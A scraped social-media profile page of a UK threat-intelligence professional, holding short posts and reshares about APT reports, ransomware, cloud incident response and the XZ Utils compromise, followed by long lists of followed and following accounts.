linkcabin @LinkCabin
Works in Security. Social Democracy. Change the World or Nothing. Personal Account not my employers, my own views! itsjack.cc UK Joined August 2012-
Tweets428
-
Followers3K
-
Following93
-
Likes482
Too many corporate CTI shops staffed by former Mil / Govies overindex on nation-state APT. Suspect it's in part because they are looking at Capability more than Intent, but also because it's what they used to track and it's cool. Ransomware actors FAR greater threat to most.
Amazing that a chip bricked in 46-yr-old Voyager I, preventing it from sending data, and NASA figured out how to split up and reallocate its functions to other hardware, sending code 15 billion miles away (45 hours round trip!)--and Voyager's back online. blogs.nasa.gov/voyager/2024/0…
Hopefully not lost in the noise today: a report from @WithSecure on Kapeka, an APT44 toolset we track as COLDWELL (dropper) and ICYWELL (backdoor). Some detection rules in the fresh APT44 report, but be sure to read their detail analysis below first labs.withsecure.com/publications/k…
Have Elastic and security experience? Why not work with me in protecting Thought Machine against threats! Apply below, DMs open - thoughtmachine.avature.net/careers/JobDet…
Join our expanding team at the European Cyber Conflict Research Incubator! We're currently seeking a Senior Program Manager and a Research Assistant. europeancyber.org/vacancies/
We’re responding to CVE-2024-3094, a reported supply chain compromise affecting XZ Utils versions 5.6.0 and 5.6.1. XZ Utils may be present in Linux distributions. See our additional guidance at cisa.gov/news-events/al….
Over 170K Users Affected by Attack Using Fake Python Infrastructure : checkmarx.com/blog/over-170k…
Looking at the Validin host fingerprint for the traffic generated by WSCRIPT, some additional (now offline) domains: infotime[.]page berlin.infotime[.]page hamburg.infotime[.]page heidelberg.infotime[.]page munich.infotime[.]page bremen.infotime[.]page
Looking at the Validin host fingerprint for the traffic generated by WSCRIPT, some additional (now offline) domains: infotime[.]page berlin.infotime[.]page hamburg.infotime[.]page heidelberg.infotime[.]page munich.infotime[.]page bremen.infotime[.]page https://t.co/fdrzRCiOwk
The bitskrieg that was and wasn’t: the military and intelligence implications of cyber operations during Russia’s war on Ukraine: Intelligence and National Security: Vol 0, No 0 tandfonline.com/doi/full/10.10…
There's some really good stuff here
Open source Threat Informed DetectionOps Platform. The presentation was impressive. code.europa.eu/ec-digit-s2/op…
Just published blog post #128 (2^7) 👨🏻💻🙌🏼 Read: "Apple Gets an 'F' for Slicing Apples" An important macOS API has a subtle flaw that can impact malware detection / security tools! 👾🍎🫣 objective-see.org/blog/blog_0x80…
New blog post: AWS Ransomware dfir.ch/posts/aws_rans… An attacker compromised an AWS account and subsequently deleted all buckets in the S3 storage. They left a 'recovery' binary behind, which we analyzed :) Enjoy.
Fascinating stuff here from MSFT: "Forest Blizzard’s (APT28) use of LLMs has involved research into various satellite and radar technologies that may pertain to conventional military operations in Ukraine, as well as generic research aimed at supporting their cyber operations."
Fascinating stuff here from MSFT: "Forest Blizzard’s (APT28) use of LLMs has involved research into various satellite and radar technologies that may pertain to conventional military operations in Ukraine, as well as generic research aimed at supporting their cyber operations."
I love this graph. It tells the truth. The #Ransomware Operator to be successful needs to pay Initial Access Brokers and acquire Infostealer Malware logs to gain access to potential victims. chainalysis.com/blog/ransomwar…
The Okta hack that keeps on giving! Cloudflare announced a new data breach today in it's continued battle against creds stolen during a previous Okta hack Let's dig in:
Fantastic write up on a cloud IR case in AWS
Fantastic write up on a cloud IR case in AWS
MalwareHunterTeam @malwrhunterteam
219K Followers 36 Following Official MHT Twitter account. Check out ID Ransomware (created by @demonslay335). More photos & gifs, less malware.Karsten Hahn @struppigel
22K Followers 702 Following Malware Researcher at G DATA. Ransomware hunter. he/him 🦔🌈🏳️⚧️ςεяβεяμs - м�.. @c3rb3ru5d3d53c
21K Followers 235 Following 💕 Malware Hunter Killer 💕 #binlex & #mwcfg Developer 📽️ YouTuber 👩💻 She/Her 💍@DravenSwiftbow Support my work 👇 ☕️ https://t.co/SfTI8uJa23blackorbird @blackorbird
28K Followers 600 Following Peace and Love. Just Analysis/Hunter. #APT #threatIntelligence #Exploit Need JobKris McConkey @smoothimpact
5K Followers 867 Following #threatintel and #dfir lead @ PwC. Blue team forever. Christian, husband, dad, coffee addict, bad photographer, awful cyclist. Tweets my own, not PwC's.Steve YARA Synapse Mi.. @stvemillertime
15K Followers 1K Following cyber-physical intel @google writing & sharing on adversary tradecraft, dfir, malware, threat detection, ics/ot intel and all things #yaraSilas Cutler // p1nk @silascutler
13K Followers 2K Following Hacker, sometimes researcher @Only_Scans, @mal_share Resident Hacker @InsideStairwell, Adjunct Senior Cyber Threat Researcher @IST_org,hasherezade @hasherezade
84K Followers 845 Following Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)Allison Wikoff @SaltyWikoff
540 Followers 823 Following #threatintel Americas Lead @pwc. Hype woman. Beach Rat. Former Adjunct @Columbia. Lover of all the APTs. | All views are my own. @[email protected]John @BitsOfBinary
2K Followers 392 Following #threatintel @PwC_UK. Reverse engineering, threat intelligence, YARA. Amateur jazz pianist. All tweets are my own. He/him.Catalin Cimpanu @campuscodi
112K Followers 1K Following Parked account. I don't post here anymore. Follow me on Mastodon: @[email protected]Michael Koczwara @MichalKoczwara
18K Followers 2K Following Founder @Intel_Ops_io Threat Intelligence, Adversary Infrastructure Hunting, Curated TI Feed (Coming Soon) https://t.co/vixTz8xKuF https://t.co/VQWaze6gaFsierra 🪩s0urcesmet.. @s0urcesmeth0ds
687 Followers 1K Following #threatintel @PwC, CTO @fbiaia, intelligence operations, analysis & tradecraft ⚙️, in some state of assessment building/refining 🔮, 💜@JMU💛, views mine0verfl0w @0verfl0w_
15K Followers 248 Following Malware Reverse Engineer & Malware Analysis Course Author - https://t.co/m6I87rMy88 & https://t.co/NxBzTphoflSentinelOne @SentinelOne
52K Followers 1K Following ONE autonomous platform to prevent, detect, respond, and hunt. Do more, save time, secure your enterprise: https://t.co/N75g1HAnCs 🐱💻Erika Bellinger @BellingerE46552
68 Followers 5K FollowingDonMonkei @KontraSkynet
15 Followers 544 FollowingYusuf Nashir @Ysfnashir
22 Followers 132 Following Semua sudah diatur oleh Tuhan. Jalani yang ada saat ini dan tuntaskan apa yang telah dimulai.Nsk @nsk_offl_
315 Followers 3K Following Director🎬& Lyricist of Kattravai Katrapin & Onedaykadhalan CyberSecurity Analyst,Travel freak, Ardent Suriya ❤ Jo,Maddy🤩,VJS😍 Fan,CR7MSD Fan🤟,Maduraikaran😎Wafer4014 @Wafer4014
67 Followers 197 FollowingHenry Chau @HinWai10
26 Followers 462 Following They won freedom while lost nothing but their shackles. 中英粵 Mandarin English Cantoneseclarkee @Clarkee
442 Followers 494 Following KICKIN IN THE FRONT SEAT, SITTIN IN THE BACK SEAT, GOTTA MAKE MY MIND UP, WHICH SEAT CAN I TAKE?Pavithran K @PavithranK76042
18 Followers 78 Followinga solitary soul thriv.. @0xsuperdemon
142 Followers 2K Following Unreadiness to following, reluctant to followers. A visionary path treader, rethinker, and on a second thought life overwhelms me, I do not know anything, AMA!De_isberg @Deberg2022
174 Followers 4K FollowingMeric Sheehan @p0tat033s
48 Followers 180 FollowingThe Eighth Life @TheEighthLife_
0 Followers 53 Followingزەردەشت @zzardaasht
263 Followers 450 Followingmindfulcyb @mindfulcyb
58 Followers 135 FollowingJevi @re_jevi
5K Followers 540 Following Provide Akamai API Provide Kasada API jevi#0417 [email protected]hell-00 @he1100_1100
701 Followers 5K Followingganesh kumar @asish80
12 Followers 673 FollowingAyosomoza @ayosomoza
54 Followers 772 FollowingDexter Castor Döppin.. @CastorDopping
26 Followers 186 Following Opinions are my own and do not reflect realityf1h3 @f1h3__
8 Followers 35 FollowingHermineZurawski @HZurawski9850
97 Followers 2K Followingth_monkey @trickster_hunt
47 Followers 497 FollowingCA$H @RobJTejas
333 Followers 3K Following Engineer turned Digital Forensicator. Thinker, tinkerer, inventor, artist, home chef, gamer, home brewer. Socially aware, spiritually awoke.ً ً @Guccifer02
4 Followers 185 Followingom prakash @om_prakash_ias
3 Followers 198 FollowingProfessorX99 @DreamerStudioTz
849 Followers 4K Following Graphics Design | Photographer | Videographer |TH SIJ @th_sij
53 Followers 392 FollowingGzobraJn @gzobraJn
40 Followers 354 Following World of today, sciences and people. DFIR / Threat Intel on a daily basis. Music and books as often as possible. Opinions are my own. RTs are not endorsements.Luke @0xlethe
5 Followers 50 FollowingZenX @ZenX_273_15
95 Followers 690 Following Can't stand corruption, oppression and thugs. My motto : ubivis semperlt23 @gr3ycardinal
1 Followers 800 Followingemacs_hacker @philohack_
148 Followers 3K FollowingMalwareHunterTeam @malwrhunterteam
219K Followers 36 Following Official MHT Twitter account. Check out ID Ransomware (created by @demonslay335). More photos & gifs, less malware.Kris McConkey @smoothimpact
5K Followers 867 Following #threatintel and #dfir lead @ PwC. Blue team forever. Christian, husband, dad, coffee addict, bad photographer, awful cyclist. Tweets my own, not PwC's.Virus Bulletin @virusbtn
59K Followers 1K Following Security information portal, testing and certification body. Organisers of the annual Virus Bulletin conference. @[email protected]Andrew Thompson @ImposeCost
34K Followers 1K Following Head of Research and Discovery @Mandiant/@GoogleCloud. Understanding and countering adversaries. Posts attributable to me—not my employer.Steve YARA Synapse Mi.. @stvemillertime
15K Followers 1K Following cyber-physical intel @google writing & sharing on adversary tradecraft, dfir, malware, threat detection, ics/ot intel and all things #yaraSilas Cutler // p1nk @silascutler
13K Followers 2K Following Hacker, sometimes researcher @Only_Scans, @mal_share Resident Hacker @InsideStairwell, Adjunct Senior Cyber Threat Researcher @IST_org,hasherezade @hasherezade
84K Followers 845 Following Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)John @BitsOfBinary
2K Followers 392 Following #threatintel @PwC_UK. Reverse engineering, threat intelligence, YARA. Amateur jazz pianist. All tweets are my own. He/him.Łukasz @maldr0id
13K Followers 999 Following Military-grade @Android malware reverse engineer @Google || "Tom Brady of malware strings analysis" - @MalwareTech || Tweets are my own opinions || he/him ✨🌈🦄Michael Koczwara @MichalKoczwara
18K Followers 2K Following Founder @Intel_Ops_io Threat Intelligence, Adversary Infrastructure Hunting, Curated TI Feed (Coming Soon) https://t.co/vixTz8xKuF https://t.co/VQWaze6gaFbriankrebs @briankrebs
348K Followers 2K Following Independent investigative journalist. Author of 'Spam Nation,' a NYT bestseller. Former Washington Post reporter. Mastodon: https://t.co/fTKNavlMwpOllie Whitehouse @ollieatnowhere
5K Followers 1K Following CTO @NCSC Former: PortSwigger, Interrupt Labs, NCC Group, BlackBerry, Symantec and AtstakeObjective-See Foundat.. @objective_see
19K Followers 1 Following 🍎 🛡️ 🛠️ Open-Source Tools 📚 "The Art of Mac Malware" books 🫂 "Objective by the Sea" conference Support us on https://t.co/tuGceSeyiC 🙏Jon DiMaggio @Jon__DiMaggio
7K Followers 811 Following Bad guy chaser, writer/author, espionage & ransomware SME. Sometimes I harass my dog. He is the brains behind these projects and opinions are his.NOELREPORTS 🇪🇺 .. @NOELreports
431K Followers 356 Following Media platform covering global conflict zones. Focus on the Russian-Ukrainian war. If you'd like to support our voluntary work: https://t.co/PmM2wwDA1Y.Jrnl Intel & Nat Sec @IntelNatSecJnl
6K Followers 205 Following The Twitter account for Intelligence & National Security (a Routledge journal). Managed by Social Media Editor David Strachan-MorrisTomas Pueyo @tomaspueyo
336K Followers 548 Following Understand deeply how the world works today to navigate the world of tomorrow. Join 80k ppl in my free newsletter:Bitmap Books @bitmap_books
26K Followers 7K Following We pride ourselves on creating retro gaming books of the highest quality. Contact: [email protected] News: https://t.co/AZKDWH0UXdSociety for Intellige.. @SocIntelHist
5K Followers 476 Following We are a membership organization for scholars focused on intelligence history, an ever-growing group that does not fit neatly into other historical subfields.Paul Darbyshire 🇪�.. @pablo_0151
10K Followers 962 Following Coffee-powered optimist. Lover of family and video games. Super Famicom hoarder, SNK nut, likes old JRPGs and box art. 🦑Filip Kovacevic @ChekistMonitor
5K Followers 971 Following PhD. Expertise: KGB (operations, personnel, spy fiction). Contributor @CWIHP, @talk_spy. 20+ years university teaching in Russia/Balkans/US. Now at @usfca.Electronic Eggs ⚡�.. @ElectronicEggs
30K Followers 168 Following Old games, Cherry Coke & Vanilla Ice-Cream Monster Munch @GuyFawkesRetro - たくさんの横スクロールとトップダウンのアーケードavallach (@xorhex@inf.. @xorhex
1K Followers 1K Following Malware Researcher Tweets are my own and do not reflect my employer. On Mastodon as @[email protected] Creator of https://t.co/woQLhjSmV0Intl Jrnl of Intellig.. @Intel_IJIC
4K Followers 203 Following Welcome to the Twitter account for the International Journal of Intelligence and CounterIntelligence, a journal for practitioners and scholars of intelligence.Journal of Threat Int.. @JournalOfTIIR
421 Followers 8 Following A peer reviewed journal that publishes original research and findings in the domains of threat intelligence and incident response.Simon Fredsted @fredsted
490 Followers 1K Following Always test your assumptions. Founder, @webhooksiteDan Black @DanWBlack
4K Followers 1K Following 🇨🇦 Manager, Cyber Espionage Analysis @Mandiant @GoogleCloud. Previous: @NATO Cyber Threat Analysis Branch & @cybercentre_ca. Views personal.Nikolay Bozhkov 尼�.. @nbozhkoff
234 Followers 2K Following cyber threat intelligence @NATO. Likes/RTs ≠ endorsements.big rob 🏴�.. @SimpleFacks
61K Followers 88 Following satirical account - a fella from norf ingerland who luvs footy, pollertiks n carlinJohanna MM Strachan @jmms_cyber
27 Followers 39 Following Cyber Security @PwC UK, all views my own. Fashion enthusiast, labrador owner & a bit of incident response on the side ✌🏼Gabriel Currie @gabrielcurrie
586 Followers 514 Following Head of Cyber Security for @cabinetofficeuk 🇬🇧. Wannabe chef and gardener, @BritishArmy reservist, and previously @PwC_UK.Jacob Rees-Evans @JacobReesEvans1
25 Followers 84 Following Threat Detection and Response at @PwC_UK | Views my own | #DFIR #InfoSecUSCYBERCOM Cybersecur.. @CNMF_CyberAlert
69K Followers 93 Following This is Cyber National Mission Force’s alert mechanism to contribute to our shared global cybersecurity (Following, retweets and links do not equal endorsement)Malcolm V Tucker 🏴.. @Tucker5law
41K Followers 13K Following ‘unbelievably rude’ - Rupert. Never ascribe to malice that which is adequately explained by fuckwittery. Voice on @AngryScotland.Joe Słowik 🌻 @jfslowik
29K Followers 1K Following CTI, OT/ICS, DE&TH, and related infosec content. Oh, and memes. And shitposting. Lots of shitposting.Your Rideshare Driver @ride_trips
20K Followers 95 Following Rideshare driver and father. Author of Drive: Scraping by in Uber's America, out May 2024. Pre-order at https://t.co/TPXNrRHle6Yonathan Klijnsma @ydklijnsma
14K Followers 2K Following Head of Threat Research at @RiskIQ. Trying to solve every puzzle I run into. Opinions expressed here are my own. (Formerly Sr. Threat Researcher @foxit)Lloyd Davies @LloydLabs
3K Followers 345 FollowingJason @CyberZen_
59 Followers 544 Following On the shores of incident response, knee deep in forensics. Python devotee. Malware RE wannabe.idatips @idatips
4K Followers 3 Following Tips and tricks for everyone's favorite disassembler. Account not run by Hex-Rays.CyberWar - 싸워 @cyberwar_15
5K Followers 117 Following Since. 2001. 8. 8 / 우리는 2001년 8월 8일부터 북한 사이버 공작원과 싸우고 있습니다.Drunk Binary @DrunkBinary
12K Followers 3K Following Principal Adversary Hunter @dragosinc, Army Veteran (3rd ACR, 1/10CAV, CYBERCOM), Cocktail Scientist, Threat Researcher/Analyst | #FSDthaddeus e. grugq the.. @thegrugq
129K Followers 423 Following Hacker :: https://t.co/km8BR8E1Ga :: [email protected] :: PGP https://t.co/dYipV8y3bo :: @warstudies :: https://t.co/H3dWknFCfk :: https://t.co/Z2lWqEVVuaBart @bartblaze
14K Followers 665 Following Threat Intel and more. Opinions are my own, unless retweeted. Open DMs.Forscie @forscie
384 Followers 848 Following Digital Forensics & Incident Response, Co-Founder @PhishToolR0 CREW @R0_CREW
6K Followers 290 Following A community of low-level information security researchers.Hopefully not lost in the noise today: a report from @WithSecure on Kapeka, an APT44 toolset we track as COLDWELL (dropper) and ICYWELL (backdoor). Some detection rules in the fresh APT44 report, but be sure to read their detail analysis below first labs.withsecure.com/publications/k…
"A Real-World Law-Enforcement Breach of End-to-End Encrypted Messaging: The Case of Encrochat" is a talk presented by Sunoo Park at RWC 2024. youtu.be/AeKRS6_zxoc?fe… Slides here: iacr.org/submit/files/s…
Discover how unauthenticated enumeration exposes AWS IAM users & roles, leveraging cross-account vulnerabilities. Quiet Riot and S3 Bucket Policies unlock a new perspective on cloud security. A must-read for security pros. buff.ly/3vfrLxh
I often get asked what tools I use for various aspects of threat research / analysis -- Here's a quick list of my favorites that most are not taking advantage of.. 🧵
🚨 👀 - The @RecordedFuture Insikt Group 2023 Annual Report is here! We cover a lot of ground in this one. Vulnerabilities, artificial intelligence, legitimate internet services, hacktivism, ransomware, influence operations, and so much more! Must read! recordedfuture.com/2023-annual-re…
A lot of the current discussion on initial access and external-facing exploitation in #infosec #cybersecurity has me thinking of this talk I proposed to BHUSA in 2020 that was rejected, but that I thought about reporting anyway: youtube.com/watch?v=0OlLsv…
Wir listen von nun an APT-Gruppen auf, die gegen Ziele in Deutschland aktiv sind. Die Quellen sind die eigene Sensorik im Regierungsnetz, vom BSI behandelte Vorfälle, sowie freigegebene Meldungen von Partnern. Demnächst wird es weitere Seiten geben. bsi.bund.de/DE/Themen/Unte…
When @alex_lanstein shares game, you best read up on what he’s saying
if you're into tracking BITTER, a few nuggets that may be useful blog.strikeready.com/blog/dont-get-…
🚨 New @RecordedFuture reporting just released revealing TAG-70's sophisticated cyber espionage in Europe. The report builds upon existing intelligence to highlight upstream infrastructure and actor tradecraft. #CyberSecurity #TAG70 #wintervivern recordedfuture.com/russia-aligned…
Looking forward to our next speaker: Sean Brennan will be talking about his super book, "The KGB and the Vatican: Secrets of the Mitrokhin Files," on Feb 13, 2024, 12:00 PM – 1:00 PM EST. Mark your calendar to join us! intelligencehistory.org/event-details/…
🕵️♂️ The silent torrent of VileRAT Get an in-depth, technical look at #VileRAT, a sophisticated Python-based malware believed to be the work of the #Evilnum threat group. Read our latest #threatresearch report here: stairwell.com/resources/tech…
late nights (evenings) in the lab (on the couch) working on something big (a mad decent YARA rule) and just grinding (watching basketball and eating ice cream, v cozy) its a mindset (I'll get bored and go to bed soon)
Properly configuring Microsoft Entra ID can help avoid cloud identity compromise that could lead to malicious attacks or even tenant destruction. The Microsoft Incident Response team provides guidance based on past engagements here: msft.it/6010iuKPK
How we will thank the vulnerability research community at @NCSC going forward - see the blog 'Thanking the vulnerability research community with NCSC Challenge Coins' "we’ll now also be awarding NCSC Challenge Coins to selected researchers." ncsc.gov.uk/blog-post/than…
In our latest writeup we analyze new macOS malware from BlueNoroff APT group that executes shell commands remotely on targeted systems. 👀
Stay vigilant, Mac users! The Jamf Threat Labs team uncovered a new piece of malware linked to the BlueNoroff group targeting macOS devices, which allows remote attacker access to the device. Read our latest research for full details. Stay safe out there! ow.ly/7gWC50Q4NJI
New open access article on eliciting information through undercover operations: tandfonline.com/doi/full/10.10…
proofpoint.com/us/blog/threat… confused by the fake browser landscape? me too - thats why I'm glad my teammates track this come for the clarity, stay for the inject examples to show the differences between the kits!